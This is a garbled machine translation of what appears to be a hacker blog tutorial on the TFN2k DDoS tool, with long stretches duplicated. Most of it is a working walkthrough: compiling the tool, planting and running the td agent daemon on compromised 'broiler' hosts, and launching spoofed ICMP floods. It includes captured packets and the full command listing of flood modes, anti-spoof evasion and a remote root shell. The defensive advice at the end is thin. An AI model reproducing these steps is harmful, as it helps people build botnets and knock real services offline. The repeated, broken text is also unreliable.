🦑 Of course, there are various methods of DOS attack, such as: UDP flood, ICMP / Ping, ICMP / SMURF ..., the specific principles can be introduced at http://www.chinaitlab.com/www/special/ciwddos.asp Take a look, there are very detailed principles and introduction of commonly used attack software. However, when it comes to DOS attack software, the most representative is tfn2k (Tribe Flood Network 2000), whose author is the famous mixter in Germany (its home page http://mixter.void.ru/papers.html), it seems that it is currently buried What tfn3k, hey , I don't know how many people are sleeping
and eating ... two. Tfn2k attack principle
1) tfn2k attack system.
tfn2k should be regarded as a masterpiece of DDOS attacks, and its functions can be astounding and amazing ... (awe of it is like a river, it continues ...) Let's take a look at its architecture.
Master --- Run tfn client to remotely control and specify attack targets, change the attack method. (Sinister evil)
Agent --- is the victim of implanted and running td process, accept the command of tfn, the implementer of the attack. It should be noted that an attacker often controls multiple agents to complete the attack, and the system is mostly unix, linux, etc. (Poor victim) The
target host --- the host or network that was attacked by DDOS Yahoo, Amazon, CNN, e-bay, etc. (the biggest victim, depressed like me)
2) tfn2k features.
◆ The master sends the command to the agent host through TCP, UDP, ICMP or random use of one of the packets (default. Random). The attack methods include TCP / SYN, UDP, ICMP / PING, mixed attacks, TARGA3, etc. .
◆ The communication between the master and the agent is unidirectional, that is, the master only sends commands to the agent, and it will use random header information, even virtual source address information. The agent will not send any information to the master in the reverse direction. .
after CAST-256 algorithm plus life, enter a keyword that is when it all compiler ◆ password command. and this password as the only authentication credentials.
◆ use td process, the master device can execute remote shell command.
◆ td process The name can be changed at compile time, which makes it easier to hide.
◆ tfn can compile and run on win32 and linux systems
...
As for the function of falsifying the source IP address, it is more basic, and compared with the old version of tfn, It is more efficient to
send out packages . In my own test, in less than 5 minutes, two agent machines paralyzed my redhat linux 9.0 system. Three . Tfn2k actual test
1 ) Test environment:
Software: redhat linux 9.0
Hardware platform:
master:
IP: 192.168.0.6
PIV2.4 / 256 * 2 / rtl8139
Ag1:
IP: 192.168.0.2
PIV2.4 / 256 * / rtl8139
AG2: IP: 192.168.0.3
pIV2.6 / 512 * 2 / 3c905
AIM: 192.168.0.5
pIV2.66c / 512 * 2 / 3c905
switch: D_link des 1024R
1) Download tfn2k.tgz (Because this software is unusual, I do n’t provide the download address. If you are interested, Find it online)
2) Unzip: tar zxvf tfn2k.tgz
3) Modify the file
A. src / Makefile If your system is a linux system, you do n’t need to do any repairs. If it is a win32 system, please
# Linux / * BSD * / Others
CC = gcc
CFLAGS = -Wall -O3
CLIBS =
These lines are commented out, and
# Win32 (cygwin)
#CC = gcc
#CFLAGS = -Wall -DWINDOZE -O2
#CLIBS = Uncomment
these lines. Because my test system is redhat linux 9.0, no changes have been made.
B. src / config. h, which is available by default. If you are interested, you can adjust it according to its annotation information.
C. src / ip.h Make some changes here, otherwise there will be compilation errors and duplicate definitions.
/ * struct in_addr
{
unsigned long int s_addr;
}; * /
Note ~ I put it between "/ * * /", which is commented out :)
D) Change the compiler:
because tfn2k supports It is egcs-1.1.2-30, and redhat linux9.0 contain
and eating ... two. Tfn2k attack principle
1) tfn2k attack system.
tfn2k should be regarded as a masterpiece of DDOS attacks, and its functions can be astounding and amazing ... (awe of it is like a river, it continues ...) Let's take a look at its architecture.
Master --- Run tfn client to remotely control and specify attack targets, change the attack method. (Sinister evil)
Agent --- is the victim of implanted and running td process, accept the command of tfn, the implementer of the attack. It should be noted that an attacker often controls multiple agents to complete the attack, and the system is mostly unix, linux, etc. (Poor victim) The
target host --- the host or network that was attacked by DDOS Yahoo, Amazon, CNN, e-bay, etc. (the biggest victim, depressed like me)
2) tfn2k features.
◆ The master sends the command to the agent host through TCP, UDP, ICMP or random use of one of the packets (default. Random). The attack methods include TCP / SYN, UDP, ICMP / PING, mixed attacks, TARGA3, etc. .
◆ The communication between the master and the agent is unidirectional, that is, the master only sends commands to the agent, and it will use random header information, even virtual source address information. The agent will not send any information to the master in the reverse direction. .
after CAST-256 algorithm plus life, enter a keyword that is when it all compiler ◆ password command. and this password as the only authentication credentials.
◆ use td process, the master device can execute remote shell command.
◆ td process The name can be changed at compile time, which makes it easier to hide.
◆ tfn can compile and run on win32 and linux systems
...
As for the function of falsifying the source IP address, it is more basic, and compared with the old version of tfn, It is more efficient to
send out packages . In my own test, in less than 5 minutes, two agent machines paralyzed my redhat linux 9.0 system. Three . Tfn2k actual test
1 ) Test environment:
Software: redhat linux 9.0
Hardware platform:
master:
IP: 192.168.0.6
PIV2.4 / 256 * 2 / rtl8139
Ag1:
IP: 192.168.0.2
PIV2.4 / 256 * / rtl8139
AG2: IP: 192.168.0.3
pIV2.6 / 512 * 2 / 3c905
AIM: 192.168.0.5
pIV2.66c / 512 * 2 / 3c905
switch: D_link des 1024R
1) Download tfn2k.tgz (Because this software is unusual, I do n’t provide the download address. If you are interested, Find it online)
2) Unzip: tar zxvf tfn2k.tgz
3) Modify the file
A. src / Makefile If your system is a linux system, you do n’t need to do any repairs. If it is a win32 system, please
# Linux / * BSD * / Others
CC = gcc
CFLAGS = -Wall -O3
CLIBS =
These lines are commented out, and
# Win32 (cygwin)
#CC = gcc
#CFLAGS = -Wall -DWINDOZE -O2
#CLIBS = Uncomment
these lines. Because my test system is redhat linux 9.0, no changes have been made.
B. src / config. h, which is available by default. If you are interested, you can adjust it according to its annotation information.
C. src / ip.h Make some changes here, otherwise there will be compilation errors and duplicate definitions.
/ * struct in_addr
{
unsigned long int s_addr;
}; * /
Note ~ I put it between "/ * * /", which is commented out :)
D) Change the compiler:
because tfn2k supports It is egcs-1.1.2-30, and redhat linux9.0 contain
s gcc-3.2.2-5, so if you do not replace gcc, tfn2k cannot be compiled. It should be noted that after the change, It will cause the software based on gcc3.2.2 not to compile, please be cautious. The
method is very simple, find a redhat linux 6.2 installation disk, set egcs-1.1.2-30.rpm, cpp-1.1.2-30. Copy rpm to ~ /
cd / mnt / cdrom / Redhat / RPMS
cp egcs-1.1.2-30 * cpp-1.1.2-30 * ~ /
Install cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm
Install egcs rpm -Uvh egcs-1.1.2-30.i386.rpm
(if prompted incorrectly, use nodeps, oldpackages, ignoreos Wait for the parameters to ignore the past)
4) Compile tfn2k
cd tfn2k / src
make
first will talk about a statement, you must accept it, and then you will be prompted to enter an 8-32 bit password, as mentioned earlier, this is the only authentication credential, will be Distributed in the td process, so be sure to remember it ~.
After compiling, td and tfn will be generated. This is the famous tfn2k ~, td is a daemon process used to install in the agent, and tfn is the control end.
5) Install td.
Upload td to my two Agents, ag1 (192.168.0.2) and ag2 (192.168.0.3), because I'm just testing, so I use a legitimate root to upload and execute the td process. If you really want to find and install an agent, you may have to pay God, because no administrator will say "come on baby . I will give you root, and install td as a proxy"
[root @ test /] ftp 192.168.0.2
Connected to 192.168.0.2.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
Name (192.168.0.2:root): wjpfjy
331 Please specify the password.
Password:
230 Login successful. Have fun.
Remote system type is UNIX.
Using binary mode to transfer files.
Ftp> put td (upload td)
local: td remote : td
227 Entering Passive Mode (192,168,0,3,198,225)
553 Could not create file.
ftp> by (quit ftp)
221 Goodbye.
[root @ test /] ssh 192.168.0.2
// Log in to ag1 to execute td, note, I use the root account so that I have sufficient permissions to execute it.
Root@192.168.0.2's password:
Last login: Tue Feb 24 06:51:13 2004
[root @ ag1 /] find / -name td- print
// Find the file td just uploaded.
[root @ ag1 wjpfjy /] chmod a + x td
// Make it execute.
[root @ ag1 wjpfjy /]./ td
// Run td, so you have a proxy, and it will only command you From: (.
Use the same method to install and run the TFN2k process td on ag2 (192.168.0.3).
6) The attack begins (the tragic memory is being staged ...)
Return to the master (192.168.0.6) and prepare for the exercise. ..
[root @ master root] #touch host.txt
// Set up a proxy record file (because if you are bored enough, you may create a lot of broilers-
// proxy, do n’t write down and forget it.)
[root @master root] echo "192.168.0.2"> host.txt Add ag1 that has executed td to host.txt.
[root @ master root] echo "192.168.0.3" >> host.txt Add ag2 to host.txt.
First
Let's test the link. [Root @ master root] ./ tfn -f host.txt -c 10 -i "mkdir wjpfjy" Communicate with the agent in host.txt and let it execute the command mkdir wjpfjy to create a directory
Protocol: random
Source IP: random
Client input:list
Command: execute remote command
Password verification:
// Here, you will be prompted to enter the password, which is the password entered during compilation. If you make a mistake, you will not be able to communicate with the td process.
Sending out packets: ..
Go to ag1 and ag2 to see if there is Create a directory name wjpfjy. Generally, it will exist in the same directory of td. If you are not sure, you can use find / -name wjpfjy -print to find
[root @ master root] ./ tfn -f host.txt -c 6- i 192.168.0.5 started ICMP / PING attack aim ... (Poor my P4, less than 5 minutes, as slow as 386), but before the game over, it still had a hard time recording the attack data, also It can be regarded as the NK Ocean. This is the packet capture record of tcpdump.
method is very simple, find a redhat linux 6.2 installation disk, set egcs-1.1.2-30.rpm, cpp-1.1.2-30. Copy rpm to ~ /
cd / mnt / cdrom / Redhat / RPMS
cp egcs-1.1.2-30 * cpp-1.1.2-30 * ~ /
Install cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm
Install egcs rpm -Uvh egcs-1.1.2-30.i386.rpm
(if prompted incorrectly, use nodeps, oldpackages, ignoreos Wait for the parameters to ignore the past)
4) Compile tfn2k
cd tfn2k / src
make
first will talk about a statement, you must accept it, and then you will be prompted to enter an 8-32 bit password, as mentioned earlier, this is the only authentication credential, will be Distributed in the td process, so be sure to remember it ~.
After compiling, td and tfn will be generated. This is the famous tfn2k ~, td is a daemon process used to install in the agent, and tfn is the control end.
5) Install td.
Upload td to my two Agents, ag1 (192.168.0.2) and ag2 (192.168.0.3), because I'm just testing, so I use a legitimate root to upload and execute the td process. If you really want to find and install an agent, you may have to pay God, because no administrator will say "come on baby . I will give you root, and install td as a proxy"
[root @ test /] ftp 192.168.0.2
Connected to 192.168.0.2.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
Name (192.168.0.2:root): wjpfjy
331 Please specify the password.
Password:
230 Login successful. Have fun.
Remote system type is UNIX.
Using binary mode to transfer files.
Ftp> put td (upload td)
local: td remote : td
227 Entering Passive Mode (192,168,0,3,198,225)
553 Could not create file.
ftp> by (quit ftp)
221 Goodbye.
[root @ test /] ssh 192.168.0.2
// Log in to ag1 to execute td, note, I use the root account so that I have sufficient permissions to execute it.
Root@192.168.0.2's password:
Last login: Tue Feb 24 06:51:13 2004
[root @ ag1 /] find / -name td- print
// Find the file td just uploaded.
[root @ ag1 wjpfjy /] chmod a + x td
// Make it execute.
[root @ ag1 wjpfjy /]./ td
// Run td, so you have a proxy, and it will only command you From: (.
Use the same method to install and run the TFN2k process td on ag2 (192.168.0.3).
6) The attack begins (the tragic memory is being staged ...)
Return to the master (192.168.0.6) and prepare for the exercise. ..
[root @ master root] #touch host.txt
// Set up a proxy record file (because if you are bored enough, you may create a lot of broilers-
// proxy, do n’t write down and forget it.)
[root @master root] echo "192.168.0.2"> host.txt Add ag1 that has executed td to host.txt.
[root @ master root] echo "192.168.0.3" >> host.txt Add ag2 to host.txt.
First
Let's test the link. [Root @ master root] ./ tfn -f host.txt -c 10 -i "mkdir wjpfjy" Communicate with the agent in host.txt and let it execute the command mkdir wjpfjy to create a directory
Protocol: random
Source IP: random
Client input:list
Command: execute remote command
Password verification:
// Here, you will be prompted to enter the password, which is the password entered during compilation. If you make a mistake, you will not be able to communicate with the td process.
Sending out packets: ..
Go to ag1 and ag2 to see if there is Create a directory name wjpfjy. Generally, it will exist in the same directory of td. If you are not sure, you can use find / -name wjpfjy -print to find
[root @ master root] ./ tfn -f host.txt -c 6- i 192.168.0.5 started ICMP / PING attack aim ... (Poor my P4, less than 5 minutes, as slow as 386), but before the game over, it still had a hard time recording the attack data, also It can be regarded as the NK Ocean. This is the packet capture record of tcpdump.
[Root @ aim root] # tcpdump -r pack.atta -c 4 -xX
08: 03: 36.524907 23.43.171.0> 192.168.0.5 icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524933 192.168.0.5> 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08 : 03: 36.524944 36.235.130.0> 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524984 192.168.0.5> 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
[root @ master root ] ./ tfn -f host.txt -c 0 Stop attack
Protocol: random
Source IP: random
Client input: list
Command: stop flooding
Password verification:
Sending out packets: ...
Of course, there are other attack methods. You can change the attack method by using -c X.
[root @ master root ] ./ tfn
usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host / ip] Specify your source IP. Randomly spoofed by default, you need
to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options / targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<- c command ID> 0-Halt all current floods on server (s) immediately
1-Change IP antispoof-level (evade rfc2267 filtering)
usage: -i 0 (fully spoofed) to -i 3 (/ 24 host bytes spoofed)
2- Change Packet size, usage: -i
3-Bind root shell to a port, usage: -i
4-UDP flood, usage: -i victim @ victim2 @ victim3 @ ...
5-TCP / SYN flood, usage: -i victim @ ... [-p destination port]
6-ICMP / PING flood, usage: -i victim @ ...
7-ICMP / SMURF flood, usage: -i victim @ broadcast @ broadcast2 @ ...
8-MIX flood (UDP / TCP / ICMP interchanged), usage: -i victim @ ...
9-TARGA3 flood (IP stack penetration ), Usage: -i victim @ ...
10 - blindly the Execute Remote shell the Command, the Command Usage -i
four defensive approach.
Like the internet, like all presentations DDOS article, DDOS hard to detect, I try to filter out all icmp packet firewall, To protect my mainframe, but what I realized was that my mainframe crashed later. Hey ~, do n’t expect me to guard against DDOS, if I can guard against it, I do n’t have to sleep: (
still the old saying, we can do What we do is to try our best not to make our host a proxy for others to attack, and to strictly restrict the intranet intranet travel, try not to harm others, as long as everyone does this, our network environment can be safer, at least, I You can sleep peacefully for a few days.
Attach a part of my firewall. It is mainly for ICMP / PING, but it is not very useful: (
08: 03: 36.524907 23.43.171.0> 192.168.0.5 icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524933 192.168.0.5> 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08 : 03: 36.524944 36.235.130.0> 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524984 192.168.0.5> 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
[root @ master root ] ./ tfn -f host.txt -c 0 Stop attack
Protocol: random
Source IP: random
Client input: list
Command: stop flooding
Password verification:
Sending out packets: ...
Of course, there are other attack methods. You can change the attack method by using -c X.
[root @ master root ] ./ tfn
usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host / ip] Specify your source IP. Randomly spoofed by default, you need
to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options / targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<- c command ID> 0-Halt all current floods on server (s) immediately
1-Change IP antispoof-level (evade rfc2267 filtering)
usage: -i 0 (fully spoofed) to -i 3 (/ 24 host bytes spoofed)
2- Change Packet size, usage: -i
3-Bind root shell to a port, usage: -i
4-UDP flood, usage: -i victim @ victim2 @ victim3 @ ...
5-TCP / SYN flood, usage: -i victim @ ... [-p destination port]
6-ICMP / PING flood, usage: -i victim @ ...
7-ICMP / SMURF flood, usage: -i victim @ broadcast @ broadcast2 @ ...
8-MIX flood (UDP / TCP / ICMP interchanged), usage: -i victim @ ...
9-TARGA3 flood (IP stack penetration ), Usage: -i victim @ ...
10 - blindly the Execute Remote shell the Command, the Command Usage -i
four defensive approach.
Like the internet, like all presentations DDOS article, DDOS hard to detect, I try to filter out all icmp packet firewall, To protect my mainframe, but what I realized was that my mainframe crashed later. Hey ~, do n’t expect me to guard against DDOS, if I can guard against it, I do n’t have to sleep: (
still the old saying, we can do What we do is to try our best not to make our host a proxy for others to attack, and to strictly restrict the intranet intranet travel, try not to harm others, as long as everyone does this, our network environment can be safer, at least, I You can sleep peacefully for a few days.
Attach a part of my firewall. It is mainly for ICMP / PING, but it is not very useful: (